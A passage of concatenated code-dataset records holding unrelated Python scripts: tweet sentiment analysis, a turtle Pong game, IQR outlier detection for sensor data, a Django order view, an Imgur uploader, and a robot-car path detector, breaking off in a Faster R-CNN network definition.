tweets:\n try:\n created_at = pd.to_datetime(tweet.created_at, utc=True).tz_convert(\n \"America/Sao_Paulo\"\n )\n frase = TextBlob(tweet.text)\n if frase.detect_language() != \"en\":\n traducao = TextBlob(\n str(frase.translate(from_lang=frase.detect_language(), to=\"en\"))\n )\n Tweet(\n tweet.id,\n str(created_at),\n traducao.sentiment[0],\n traducao.sentiment[1],\n tweet.text,\n str(traducao),\n ).save()\n else:\n Tweet(\n str(created_at), frase.sentiment[0], frase.sentiment[1], tweet.text\n ).save()\n except NotTranslated as e:\n logger.error(f\"error to translate tweet: {e}\")\n logger.success(\"finish\")\n\n\nclass ComputeCommand:\n def __init__(self):\n pass\n\n def get_percent(self, value, value_total):\n return float(\"{0:.2f}\".format((value / value_total) * 100))\n\n def execute(self, days_back):\n df = pd.DataFrame(Tweet().get({\"sentiment_polarity\": {\"$ne\": 0}}))\n df[\"created_at\"] = pd.to_datetime(df[\"created_at\"])\n df.set_index(\"created_at\", inplace=True)\n date_used = str(date.today() - timedelta(days_back))\n logger.info(f\"date used to compute: {date_used}\")\n try:\n df = df[date_used]\n tweet_computed = TweetComputed(\n len(df),\n self.get_percent(len(df[df[\"sentiment_polarity\"] < 0]), len(df)),\n len(df[df[\"sentiment_polarity\"] < 0]),\n date_used,\n )\n tweet_computed.save()\n except Exception as e:\n logger.error(f\"error to compute tweets: {e}\")\n","repo_name":"msAlcantara/bozohate","sub_path":"bozohate/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"6193417217","text":"# Welcome to Po's Python Pong Game\n# By Po Kealiinohomoku\n# Intensive Project 1\n\nimport turtle\n\n# Screen setup\n\nwin = turtle.Screen()\nwin.title(\"Po's Python Pong\")\nwin.bgcolor(\"black\")\nwin.setup(width=800, height=600)\nwin.tracer(0)\n\n\n# Gameplay objects\n\n\n# Score Variables\nscore_a = 0\nscore_b = 0\n\n\n# Player 1 Paddle\npaddle_a = turtle.Turtle()\npaddle_a.speed(0)\npaddle_a.shape(\"square\")\npaddle_a.color(\"white\")\npaddle_a.shapesize(stretch_wid=5, stretch_len=1)\npaddle_a.penup()\npaddle_a.goto(-350, 0)\n\n# Player 2 Paddle\npaddle_b = turtle.Turtle()\npaddle_b.speed(0)\npaddle_b.shape(\"square\")\npaddle_b.color(\"white\")\npaddle_b.shapesize(stretch_wid=5, stretch_len=1)\npaddle_b.penup()\npaddle_b.goto(350, 0)\n\n\n# Game Ball\nball = turtle.Turtle()\nball.speed(0)\nball.shape(\"circle\")\nball.color(\"white\")\nball.penup()\nball.goto(0, 0)\n\n\n# Scoreboard\ntitle = turtle.Turtle()\ntitle.speed(0)\ntitle.color(\"white\")\ntitle.penup()\ntitle.hideturtle()\ntitle.goto(0, 260)\ntitle.write(\"P1 score: 0 | P2 score: 0\",\n align=\"center\", font=(\"Chiller\", 22, \"normal\"))\n\n# Game Ball Physics\nball.dx = 4\nball.dy = 2\n\n\n# Player Input Functions\n\n\n# Paddle a\ndef paddle_a_up():\n y = paddle_a.ycor()\n y += 20\n paddle_a.sety(y)\n\n\ndef paddle_a_down():\n y = paddle_a.ycor()\n y -= 20\n paddle_a.sety(y)\n\n\n# Paddle b\ndef paddle_b_up():\n y = paddle_b.ycor()\n y += 20\n paddle_b.sety(y)\n\n\ndef paddle_b_down():\n y = paddle_b.ycor()\n y -= 20\n paddle_b.sety(y)\n\n\nwin.listen()\nwin.onkeypress(paddle_a_up, \"w\")\nwin.onkeypress(paddle_a_down, \"s\")\nwin.onkeypress(paddle_b_up, \"Up\")\nwin.onkeypress(paddle_b_down, \"Down\")\n\n\n# Main Game Loop\nwhile True:\n win.update()\n\n # Move Ball Code\n ball.setx(ball.xcor() + ball.dx)\n ball.sety(ball.ycor() + ball.dy)\n\n # Basic Border Checking\n if ball.xcor() > 390:\n ball.dx *= -1\n ball.goto(0, 0)\n title.clear()\n score_a += 1\n title.write(\"P1 score: \" + str(score_a) + \" | P2 score: \" +\n str(score_b), align=\"center\", font=(\"Courier\", 22, \"normal\"))\n\n if ball.xcor() < -390:\n ball.dx *= -1\n ball.goto(0, 0)\n title.clear()\n score_b += 1\n title.write(\"P1 score: \" + str(score_a) + \" | P2 score: \" +\n str(score_b), align=\"center\", font=(\"Courier\", 22, \"normal\"))\n\n if ball.ycor() > 290:\n ball.dy *= -1\n\n if ball.ycor() < -290:\n ball.dy *= -1\n\n # Collision Dectecting\n\n if(ball.xcor() > 340 and ball.xcor() < 350) and (ball.ycor() < paddle_b.ycor()+50 and ball.ycor() > paddle_b.ycor()-50):\n ball.dx = ball.dx * -1\n\n if(ball.xcor() > -350 and ball.xcor() < -340) and (ball.ycor() < paddle_a.ycor()+50 and ball.ycor() > paddle_a.ycor()-50):\n ball.dx = ball.dx * -1\n","repo_name":"KuponoK/pos-python-pong","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17807524086","text":"import pandas as pd\r\nimport numpy as np\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport math\r\n\r\n\r\n\r\nclass IQR():\r\n\r\n def __init__(self):\r\n #self.use_classes = [\r\n #'Outside_Air_Temperature_Sensor',\r\n #'Chilled_Water_Return_Temperature_Sensor', 'Chilled_Water_Supply_Temperature_Sensor', 'Hot_Water_Supply_Temperature_Sensor', 'Preheat_Supply_Air_Temperature_Sensor', 'Return_Air_Temperature_Sensor', 'Return_Water_Temperature_Sensor', 'Supply_Air_Temperature_Sensor',\r\n #Cooling_Valve', 'Reheat_Valve', 'Valve',\r\n #'Differential_Pressure_Sensor',\r\n #'Discharge_Air_Static_Pressure_Sensor', 'Supply_Air_Static_Pressure_Sensor',\r\n #'Heat_Exchanger', 'Variable_Frequency_Drive',\r\n #'Return_Fan', 'Supply_Fan',\r\n #'Power_Sensor',\r\n #'Pump',\r\n #'Energy_Sensor'\r\n #]\r\n self.use_classes = ['Outside_Air_Temperature_Sensor']\r\n\r\n\r\n def read_features_from_file(self, filename, inv_features= [], short_files=[]):\r\n print(\"reading from file\")\r\n feature_dict = {}\r\n file_dict = {}\r\n f = open(filename, \"r\", encoding=\"UTF-8\")\r\n invalid_features = inv_features\r\n #count = 0\r\n for line in f:\r\n #count += 1\r\n line = line.strip()\r\n line = line.replace(\"&\", \" \")\r\n line = line.replace(\"//\", \"/\")\r\n line = line.replace(\", \", \"-\") #Makes sure we do not split within feature names (some have spaces)\r\n line = line.split(\" \")\r\n sensor = line[0].split(\"/\")[3].strip()\r\n if sensor not in self.use_classes or line[0].strip() in short_files: #Skips sensor if it is not relevant\r\n continue\r\n for i in range(len(self.use_classes)):\r\n if sensor == self.use_classes[i]:\r\n sensor = i\r\n \r\n if sensor not in feature_dict: #If sensor is not already a key in the dictionary\r\n feature_dict[sensor] = []\r\n file_dict[sensor] = []\r\n sensor_features = {}\r\n\r\n file_dict[sensor].append(line[0])\r\n \r\n for i in range(1, len(line)-1, 2):\r\n \r\n if line[i+1] == \"nan\":\r\n sensor_features[line[i]] = 1\r\n if line[i] not in invalid_features:\r\n invalid_features.append(line[i])\r\n else: \r\n sensor_features[line[i]] = float(line[i+1])\r\n \r\n feature_dict[sensor].append(sensor_features)\r\n #print(f\"num_files: {count}\")\r\n #feature_dict = self.remove_invalid_values(feature_dict, list(set(invalid_features)))\r\n return feature_dict, invalid_features\r\n\r\n def read_features_from_file2(self, filename, invalid):\r\n feature_dict = {}\r\n f = open(filename, \"r\", encoding=\"UTF-8\")\r\n for line in f:\r\n line = line.strip()\r\n line = line.replace(\"&\", \" \")\r\n line = line.replace(\"//\", \"/\")\r\n line = line.replace(\", \", \"-\") #Makes sure we do not split within feature names (some have spaces)\r\n line = line.split(\" \")\r\n sensor = line[0].split(\"/\")[3].strip()\r\n if sensor not in self.use_classes:\r\n continue\r\n\r\n feature_dict[line[0].strip()] = {}\r\n for i in range(1, len(line)-1, 2):\r\n if line[i].strip() not in invalid:\r\n feature_dict[line[0].strip()][line[i]] = float(line[i+1])\r\n return feature_dict\r\n\r\n def remove_invalid_values(self, dict, invalid_list):\r\n print(\"removing invalid features\")\r\n #print(f\"invalid_list: {invalid_list}\")\r\n for invalid_feature in invalid_list:\r\n for sensor in dict:\r\n for el in dict[sensor]:\r\n el.pop(invalid_feature, None)\r\n return dict\r\n \r\n def dict_to_arrays(self, feature_dict, file_dict):\r\n \"\"\"Convertin to arrays\"\"\"\r\n features = [] #2d array\r\n target = [] #1d array that holds the corresponding classes\r\n file_list = []\r\n num = 0\r\n\r\n for sensor in feature_dict:\r\n\r\n for i in range(len(feature_dict[sensor])):\r\n tmp_lst = []\r\n file_list.append(file_dict[sensor][i])\r\n\r\n for feature in feature_dict[sensor][i]:\r\n tmp_lst.append(feature_dict[sensor][i][feature])\r\n features.append(tmp_lst)\r\n target.append(sensor)\r\n return np.array(features), np.array(target), np.array(file_list)\r\n \r\n def order_by_feat(self, features):\r\n dict = {}\r\n for sensor in features:\r\n for individual_sensor in features[sensor]: #This is a dict-element\r\n for feat in individual_sensor:\r\n if feat not in dict:\r\n dict[feat] = [individual_sensor[feat]]\r\n else: \r\n dict[feat].append(individual_sensor[feat])\r\n return dict \r\n \r\n\r\n def find_quartiles(self, grouped_dict):\r\n \"\"\"Takes in a dict grouped by features, return a dict by features with lower and upped limit\"\"\"\r\n bound_dict = {}\r\n for feat in grouped_dict: \r\n grouped_dict[feat].sort()\r\n tmp = grouped_dict[feat]\r\n lower_bound = math.floor(len(tmp) * 0.1)#Index for lower 25 % \r\n upper_bound = math.ceil(len(tmp) * 0.9) - 1#Index for the upper 75%\r\n iqr = tmp[upper_bound] - tmp[lower_bound] #Interquartile range \r\n min_outlier = tmp[lower_bound] - (1.5 * iqr)\r\n max_outlier = tmp[upper_bound] + (1.5 * iqr)\r\n bound_dict[feat] = [min_outlier, max_outlier]\r\n return bound_dict \r\n\r\n def identify_outliers(self, features, bound_dict):\r\n outliers = []\r\n for el in features:\r\n count = 0\r\n for feat in features[el]:\r\n if features[el][feat] <= bound_dict[feat][0] or features[el][feat] >= bound_dict[feat][1]:\r\n count += 1\r\n #print(\"count upped\")\r\n if count >= 275: #275 is used as deafult\r\n outliers.append(el.strip())\r\n return outliers\r\n \r\n def return_outliers(self, use_classes, total_invalid, short_files=[], filepath=\"comprehensive_features_10m_train.txt\"): #Use classes is a list consisting of the sensors you want to find outliers for\r\n self.use_classes = use_classes\r\n feat, invalid = self.read_features_from_file(filepath, inv_features=total_invalid)\r\n\r\n grouped = self.order_by_feat(feat)\r\n\r\n bound_dict = self.find_quartiles(grouped)\r\n\r\n train_feat = self.read_features_from_file2(filepath, invalid)\r\n\r\n outliers = self.identify_outliers(train_feat, bound_dict)\r\n #print(self.use_classes)\r\n #print(len(outliers))\r\n return outliers\r\n \r\n\r\nif __name__ == \"__main__\":\r\n iqr = IQR()\r\n\r\n #outliers = iqr.return_outliers(['Outside_Air_Temperature_Sensor'])\r\n\r\n #print(len(outliers))\r\n\r\n g1 = ['Outside_Air_Temperature_Sensor']\r\n g2 = ['Chilled_Water_Return_Temperature_Sensor', 'Chilled_Water_Supply_Temperature_Sensor', 'Hot_Water_Supply_Temperature_Sensor', 'Preheat_Supply_Air_Temperature_Sensor', 'Return_Air_Temperature_Sensor', 'Return_Water_Temperature_Sensor', 'Supply_Air_Temperature_Sensor']\r\n g3 = ['Cooling_Valve', 'Reheat_Valve', 'Valve']\r\n g4 = ['Differential_Pressure_Sensor']\r\n g5 = ['Discharge_Air_Static_Pressure_Sensor', 'Supply_Air_Static_Pressure_Sensor', ]\r\n g6 = ['Heat_Exchanger', 'Variable_Frequency_Drive']\r\n g7 = ['Return_Fan', 'Supply_Fan']\r\n g8 = ['Power_Sensor']\r\n g9 = ['Pump']\r\n g10 = ['Energy_Sensor']\r\n \r\n groupings = [g1, g2, g3, g4, g5, g6, g7, g8, g9, g10]\r\n outliers = []\r\n for i in range(len(groupings)):\r\n tmp = iqr.return_outliers(groupings[i], [])\r\n #print(f\"len {i}: {len(tmp)}\")\r\n outliers = outliers + tmp\r\n print(i)\r\n print(f\"len_outliers: {len(tmp)}\")\r\n print(tmp)\r\n\r\n print(len(outliers))","repo_name":"HavardRMinsas/Tag_Inference","sub_path":"IQR_outliers.py","file_name":"IQR_outliers.py","file_ext":"py","file_size_in_byte":8157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14640845326","text":"from django.shortcuts import render\nfrom .models import UserDeliveryInfo\nfrom .models import OrderedBookList\nfrom .models import Book\nfrom django.views.generic import View\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\n\n# Create your views here.\n\n\nclass Order(View):\n def get(self, request):\n ordered_book_lists = OrderedBookList.objects.all()\n book_lists = Book.objects.all()\n book_list = []\n for item in ordered_book_lists:\n if item.ordered_user_id == 'user1':\n book_list.append(item.ordered_book_id)\n for book in book_lists:\n if book.book_id == item.ordered_book_id:\n book_list.append(book)\n context = {\n 'book_list': book_list,\n }\n return render(request, 'prepare/order.html', context)\n\n def post(self, request):\n name = request.POST.get('user_name')\n phone = request.POST.get('user_phone')\n address = request.POST.get('user_address')\n message = False\n if name and phone and address:\n message = True\n message = 'Your order has been placed, ' + name\n context = {\n 'name': name,\n 'phone': phone,\n 'address': address,\n 'message': message,\n }\n return render(request, 'prepare/result.html', context)\n\n\n","repo_name":"idealization/Gojangnan-Aladin","sub_path":"Implement/2.Payment_System/develop/paymentPage/s-e/payment/prepare/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"598631068","text":"import os\nimport shutil\n\nstring = 'hello_word_kappa_pride'\nprint(string.rfind('_'))\nprint(string[:string.rfind('_')])\n\npath_to_dataset = 'the-simpsons-characters-dataset\\\\kaggle_simpson_testset\\kaggle_simpson_testset'\nclasses = {}\n\nwith open('classes_threshold.txt', 'r') as file:\n for character in file:\n character = character.strip()\n classes[character] = []\n\nfor image in os.listdir(path_to_dataset):\n character = image[:image.rfind('_')]\n classes[character].append(os.path.join(path_to_dataset, image))\n\nprint('classes number:', len(classes))\nprint('total images:', len(os.listdir(path_to_dataset)), '\\n')\nwith open('classes_threshold.txt', 'w') as file:\n for character, counter in sorted(classes.items(), key=lambda x: len(x[1]), reverse=True):\n print(character, '=', len(counter))\n print(character, file=file)\n\n# waylon_smithers = 0\n# maggie_simpson = 0\n# groundskeeper_willie = 0\n# barney_gumble = 0\n# selma_bouvier = 0","repo_name":"NoVarlok/coursework-ML","sub_path":"create_test_dir.py","file_name":"create_test_dir.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14356945497","text":"import os\nimport sys\n\nimport pyperclip\nfrom dotenv import load_dotenv\nfrom imgurpython import ImgurClient\n\nload_dotenv()\n\nclient_id = os.getenv(\"CLIENT_ID\")\nclient_secret = os.getenv(\"CLIENT_SECRET\")\n\n# 画像パスの指定\nargs = sys.argv\nimage_path = args[1]\n\nprint(\"image_path: \" + image_path)\n\nclient = ImgurClient(client_id, client_secret)\n\n# 画像アップロード\nprint(\"# uploading ...🔖\")\nimage = client.upload_from_path(image_path, config=None, anon=True)\n\n# 画像リンク表示\nprint(\"# upload done✅\")\nprint(image[\"link\"])\npyperclip.copy(image[\"link\"])\nprint(\"クリップボード⌨にコピーしたーお㊢\")","repo_name":"EveSquare/-p-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2189935473","text":"\"\"\"This is a simplistic Path Detector.\n\n A Path Detector module is a python file that contains a `detect` function\n that is capable of analyzing a binarized image in which non-zero pixels\n indicate road boundaries. The analysis should identify the path (or,\n multiple paths) to follow.\n\n See the description of the `detect` function below for more details.\n\n This Simplistic Path Detector implements a first crude idea to path\n detection, and needs ample modification in order to obtain a working\n prototype.\n\n In this Simplistic Path Detector, a path is detected by sampling a single\n row towards the bottom of the image. Non-zero pixels are identified to\n infer the road between the car center and the road center is calculated and\n used as the path to follow. \"\"\"\n\nimport logging\nimport numpy as np\nimport cv2\nimport time \nfrom scipy import ndimage\n\n\n# Log which path detector is being used. This appears in the output. Useful\n# for ensuring that the correct path detector is being used.\nlogging.info('Bacar0 ZEN is ready for departure')\n\n\ndef detect(mask):\n \"\"\"This function receives a binarized image in its `mask` argument\n (`mask` is a h x w numpy array where h is the height and w the width).\n The non-zero pixels in the array encode road boundaries.\n\n The task of this function is to analyze the mask, and identify the path\n that the car should follow.\n\n Returns: a tuple (dict, img) where:\n `dict` is a dictionary that is transmitted to the state machine\n it should contain all the information that the state machine\n requires to actuate the identified path(s).\n Implementors are free to encode this information in the dictionary\n in any way that they like. Of course, the state machine needs to\n be written correspondingly to correctly decode the information.\n\n `img` is optionally a numpy array (of the same width and height\n as the mask) that visualizes the found path. Used for\n visualization in the viewer only.\n \"\"\"\n\n img_height, img_width = mask.shape\n x0 = int(img_width / 2) # center of the image\n # row to sample (first row at the top is row zero)\n y0 = int(img_height*0.65)\n\n # assume the car center is at coordinate (img_width/2, img_height)\n car_center = (x0, img_height)\n\n # assure no obstacle is in front of the car. In order to do this,we take several\n # points on the vertical line passing through the centre of the car and a couple\n # to the left and the right of the car. It covers a greater area so the\n # possiblity of the car swerving because of noise is unlikely. These are marked\n # in pink\n\n dead_center = (int(img_width/2) , int(img_height/2) )\n delta = 12 \n ref0 = ( x0 , y0 )\n ref1 = ( x0 , int(y0 - delta) )\n ref2 = ( x0 , int(y0 - 1.5*delta))\n ref3 = ( x0 , int(y0 - 2*delta))\n ref4 = ( x0 , int(y0 - 2.5*delta))\n ref5 = ( x0 , int(y0 - 3*delta))\n ref6 = ( x0 , int(y0 - 4*delta))\n ref7 = (int(x0 - delta) , int(y0 - delta) )\n ref8 = (int(x0 + delta) , int(y0 - delta) )\n\n ref_list = [ ref1 , ref2 , ref3 , ref4 , ref5, ref6 , ref7, ref8]\n \n\n # If the car approaches an obstacle, we must check the surroundings to the left\n # and to the right. These points are marked yellow\n\n left1 = ( int(x0-2.5*delta) , int(y0-delta) )\n left2 = ( int(x0-2.5*delta) , int(y0-1.5*delta) )\n left3 = ( int(x0-2.5*delta) , int(y0-2.5*delta) )\n left4 = ( int(x0-3*delta) , int(y0-1.5*delta) )\n left_list = [left1, left2, left3, left4 ]\n\n right1 = ( int(x0+2.5*delta) , int(y0-delta) )\n right2 = ( int(x0+2.5*delta) , int(y0-1.5*delta) )\n right3 = ( int(x0+2.5*delta) , int(y0-2.5*delta) )\n right4 = ( int(x0+3*delta) , int(y0-1.5*delta) )\n right_list = [right1, right2, right3, right4 ]\n\n #If the car approaches an intersaction where it can go left or right, it will\n #detect those directions and know it is possible to turn in this direction. To do\n #so, a series of dots are marked in cyan on bird's view map and are used to tell\n #if those are non zero.\n\n cross1L = ( int(x0-3.4*delta) , int(y0-3*delta) )\n cross2L = ( int(x0-3.6*delta) , int(y0-2.5*delta) )\n cross3L = ( int(x0-3.9*delta) , int(y0-2*delta) )\n cross4L = ( int(x0-3.6*delta) , int(y0-1.5*delta) )\n cross5L = ( int(x0-3.4*delta) , int(y0-1*delta) )\n cross6R = ( int(x0+3.4*delta) , int(y0-3*delta) )\n cross7R = ( int(x0+3.6*delta) , int(y0-2.5*delta) )\n cross8R = ( int(x0+3.9*delta) , int(y0-2*delta) )\n cross9R = ( int(x0+3.6*delta) , int(y0-1.5*delta) )\n cross10R = ( int(x0+3.4*delta) , int(y0-1*delta) )\n cross_left=[cross1L,cross2L,cross3L,cross4L,cross5L]\n cross_right = [cross6R, cross7R, cross8R, cross9R, cross10R ]\n #A couple of points are used to predict the road far ahead. If the points are on \n #the road (the are mostly zeros) the the car will continue ahead without\n #interference\n\n far1 = ( x0, 0 )\n far2 = (int(x0-.8*delta), int(.5*delta) )\n far3 = (int(x0+.8*delta), int(.5*delta) )\n far4 = (int(x0-1.6*delta), int(delta))\n far5 = (int(x0+1.6*delta), int(delta))\n far_list = [far1, far2, far3, far4, far5 ]\n\n #Verify the car can turn left or right if the sign given by the path_detector says\n #so\n \n left_o = 0\n right_o= 0\n clear_left = False\n clear_right = False\n\n for this in cross_left:\n if int(mask[this[1]][this[0]]) == 0:\n left_o = left_o + 1\n for that in cross_right:\n if int(mask[that[1]][that[0]]) == 0:\n right_o = right_o + 1\n \n\n #First case: no obstacles found in front of the car: find the road centre and\n #directs towards it\n \n obstacle_det = 0\n for elem in ref_list:\n if int(mask[elem[1]][elem[0]]) != 0:\n obstacle_det = obstacle_det + 1\n\n if left_o >= 4 and obstacle_det <= 3:\n clear_left = True\n if right_o >=4 and obstacle_det <= 3:\n clear_right = True\n\n if obstacle_det <= 3:\n \n far_obst = 0\n for dot in far_list:\n if int(mask[dot[1]][dot[0]]) != 0:\n far_obst = far_obst + 1\n \n #If the road is straight as far as the camera can see, the car will go straight\n if far_obst == 0:\n \n heading = 0\n road_center = dead_center\n path_dict = {'heading': heading, 'car_center': car_center, 'clear_left': clear_left, 'clear_right': clear_right }\n path_img = np.zeros((img_height, img_width, 3), np.uint8)\n\n else:\n\n # try to find the road center by sampling the horizontal line passing\n # through (x0,y0) -- find_center is a function defined further below\n road_center = find_center(mask, x0, y0)\n\n # calculate the angle between the vertical line that passes through\n # the car center and the line that connects the car center with the road\n # center -- model_to_heading is a function further defined below\n heading = model_to_heading(road_center, car_center)\n\n # send the calculated information to the state machine\n # NOTE: one may want to extend the analysis and measure, e.g., how\n # reliable the path is (in other words: how long one thinks one could\n # follow it.) If this is measured one may also want to include it in\n # this dictionary so that the state\n # machine can use this.\n path_dict = {'heading': heading, 'car_center': car_center, 'clear_left': clear_left, 'clear_right': clear_right }\n \n # uncomment the following line if you want to print the dictionary\n # for debugging purposes\n # logging.debug('returning %s' % str(path_dict))\n\n # for debugging purposes, we visualize the above process\n \n # create a new image, of the same dimensions as mask, but colore\n path_img = np.zeros((img_height, img_width, 3), np.uint8)\n\n \n \n #If the car detects an obstacle, the it will use the yellow dots to guide itself: \n #if the path is clear to the right, the it will go right. If the path is clear to\n #the left, it will go left. \n \n\n elif obstacle_det > 3:\n\n left_obst = 0\n right_obst= 0\n for point in left_list:\n if int(mask[point[1]][point[0]]) != 0:\n left_obst = left_obst + 1\n for k in right_list:\n if int(mask[k[1]][k[0]]) != 0:\n right_obst = right_obst + 1\n if right_obst < 2:\n heading = -12\n elif left_obst <2:\n heading = 12\n \n \n\n #If the car detects an obstacle and it can not go neither left or right, the it is \n #a dead end and the car will turn around \n \n elif right_obst >= 2 and left_obst >= 2:\n heading = 16\n\n path_dict = {'heading': heading, 'car_center': car_center, 'clear_left': clear_left, 'clear_right': clear_right }\n # create a new image, of the same dimensions as mask, but colore\n path_img = np.zeros((img_height, img_width, 3), np.uint8)\n road_center = ( 0, y0 )\n\n\n\n # Draw a small filled dot at the car center, 4 pixels wide, in blue\n cv2.circle(path_img, car_center, 4, (255, 0, 0), -1)\n\n # Draw a green line to display the row that was sampled\n cv2.line(path_img, (0, y0), (img_width, y0), (0, 255, 0))\n\n # Draw a small filled dot at the calculated road center, 4 pixels wide,\n # in red\n cv2.circle(path_img, road_center, 4, (0, 0, 255), -1)\n\n # Draw a small pink dot for each point used for obstacle detection\n\n cv2.circle(path_img, ref0 , 3 , (180,105,255), -1)\n cv2.circle(path_img, ref1 , 2 , (180,105,255), -1)\n cv2.circle(path_img, ref2 , 2 , (180,105,255), -1)\n cv2.circle(path_img, ref3 , 2 , (180,105,255), -1)\n cv2.circle(path_img, ref4 , 2 , (180,105,255), -1)\n cv2.circle(path_img, ref5 , 2 , (180,105,255), -1)\n cv2.circle(path_img, ref6 , 2 , (180,105,255), -1) \n cv2.circle(path_img, ref7 , 2 , (180,105,255), -1)\n cv2.circle(path_img, ref8 , 2 , (180,105,255), -1)\n \n # Draw a small yellow dot for each point used for emergency steering\n\n cv2.circle(path_img, left1 , 2, (0,255,255), -1)\n cv2.circle(path_img, left2 , 2, (0,255,255), -1)\n cv2.circle(path_img, left3 , 2, (0,255,255), -1)\n cv2.circle(path_img, left4 , 2, (0,255,255), -1)\n cv2.circle(path_img, right1, 2, (0,255,255), -1)\n cv2.circle(path_img, right2, 2, (0,255,255), -1)\n cv2.circle(path_img, right3, 2, (0,255,255), -1)\n cv2.circle(path_img, right4, 2, (0,255,255), -1)\n\n #Draw a small cyan dot for every cross point used to detect 3 and 4 way crossses\n\n cv2.circle(path_img, cross1L, 2, (255,255,0), -1)\n cv2.circle(path_img, cross2L, 2, (255,255,0), -1)\n cv2.circle(path_img, cross3L, 2, (255,255,0), -1)\n cv2.circle(path_img, cross4L, 2, (255,255,0), -1)\n cv2.circle(path_img, cross5L, 2, (255,255,0), -1)\n cv2.circle(path_img, cross6R, 2, (255,255,0), -1)\n cv2.circle(path_img, cross7R, 2, (255,255,0), -1)\n cv2.circle(path_img, cross8R, 2, (255,255,0), -1)\n cv2.circle(path_img, cross9R, 2, (255,255,0), -1)\n cv2.circle(path_img, cross10R, 2, (255,255,0), -1)\n\n #Draw a small red dot for every point used to detect the road far ahead \n\n cv2.circle(path_img, far1, 2, (0,0,255), -1)\n cv2.circle(path_img, far2, 2, (0,0,255), -1)\n cv2.circle(path_img, far3, 2, (0,0,255), -1)\n cv2.circle(path_img, far4, 2, (0,0,255), -1)\n cv2.circle(path_img, far5, 2, (0,0,255), -1)\n\n\n # Return the path dictionary and image. The path_dict will be sent\n # to the state machine. The path_img is displayed in the viewer\n return (path_dict, path_img)\n\n\ndef find_center(mask, x, y):\n \"\"\"Sample the horizontal line passing through coordinate (x,y) for non-zero\n pixels in mask to determine road center\"\"\"\n img_height, img_width = mask.shape\n sample_width = int(img_width / 2)\n p0 = np.array([x, y])\n pl = np.array([x-sample_width, y])\n pr = np.array([x+sample_width, y])\n\n # Take 40 samples on the left and 40 samples on the right\n # profile is a function further defined below\n xl, yl, l_val = profile(mask, p0, pl, 60)\n xr, yr, r_val = profile(mask, p0, pr, 60)\n\n # now analyze the sampling: find the first non-zero pixel in the samples\n idx_l = np.nonzero(l_val)[0]\n idx_r = np.nonzero(r_val)[0]\n\n if idx_l.size == 0:\n # No non-zero pixel was found on the left. This means that we don't\n # see the left hand side of the road on row y0\n # arbitrarily set the road boundary at x = x0 - 30\n # this parameter value (30) likely needs to be tuned\n contact_l = p0 + np.array([-30, 0])\n else:\n # Interpret the first non-zero pixel as the road boundary\n contact_l = np.array([xl[idx_l[0]], yl[idx_l[0]]])\n\n if idx_r.size == 0:\n contact_r = p0 + np.array([30, 0])\n else:\n contact_r = np.array([xr[idx_r[0]], yr[idx_r[0]]])\n\n # we define the road center to be mid-way contact_l and contact_r\n center = (contact_l + contact_r) / 2\n return (int(center[0]), int(center[1]))\n\n\ndef model_to_heading(model_xy, car_center_xy):\n \"\"\"Calculate the angle (in degrees) between the vertical line that\n passes through the point `car_center_xy` and the line that connects\n `car_center_xy` with `model_xy`.\n A negative angle means that the car should turn clockwise; a positive\n angle that the car should move counter-clockwise.\"\"\"\n dx = 1. * model_xy[0] - car_center_xy[0]\n dy = 1. * model_xy[1] - car_center_xy[1]\n\n heading = -np.arctan2(dx, -dy)*180/np.pi\n\n return heading\n\n\ndef profile(mask, p0, p1, num):\n \"\"\"Takes `num` equi-distance samples on the straight line between point `p0`\n and point `p2` on binary image `mask`.\n\n Here, points p0 and p1 are 2D points (x-coord,y-coord)\n\n Returns: a triple (n, m, vals) where:\n - n is a numpy array of size `num` containing the x-coordinates of\n sampled points\n - m is a numpy array of size `num` containing the y-coordinates of\n sampled points\n - vals is a numpy array of size `num` containing the sampled point\n values, i.e. vals[i] = mask[m[i], n[i]]\n (recall that images are indexed first on y-coordinate, then on\n x-coordinate)\n \"\"\"\n n = np.linspace(p0[0], p1[0], num)\n m = np.linspace(p0[1], p1[1], num)\n return [n, m, ndimage.map_coordinates(mask, [m, n], order=0)]\n","repo_name":"Jvdelft/First-Year","sub_path":"Autonomous Car/Code/path_detector.py","file_name":"path_detector.py","file_ext":"py","file_size_in_byte":14622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8853030566","text":"# 소인수분해\n\nN = int(input())\ni = 2\nwhile N != 1:\n if N % i == 0:\n N = N / i\n print(i)\n else:\n i += 1\n\n# 나누어 떨어지면 출력. 아니라면 나누는 수를 1씩 증가시켜서 다시 나눈다. 리스트 만들어서 하는사람도 있던데 이게 더 나은듯.\n","repo_name":"taehwan920/Algorithm","sub_path":"baekjoon/11653 factorization.py","file_name":"11653 factorization.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28120177079","text":"from tensorflow.keras.layers import (Conv2D, Dense, Flatten, Input, Reshape,\n TimeDistributed)\nfrom tensorflow.keras.models import Model\n\nfrom nets.resnet import ResNet50, classifier_layers\nfrom nets.RoiPoolingConv import RoiPoolingConv\n\n\n# 创建建议框网络\n# 该网络结果会对先验框进行调整获得建议框\ndef get_rpn(base_layers, num_anchors):\n '''\n 创建rpn网络\n Parameters\n ----------\n base_layers:resnet50输出的特征层(None,38,38,1024)\n num_anchors:先验框框数量,通常为9,即每个网格分配有9个先验框\n\n Returns\n -------\n\n '''\n # 利用一个512通道的3x3卷积进行特征整合\n x = Conv2D(512, (3, 3), padding='same', activation='relu',\n kernel_initializer='normal', 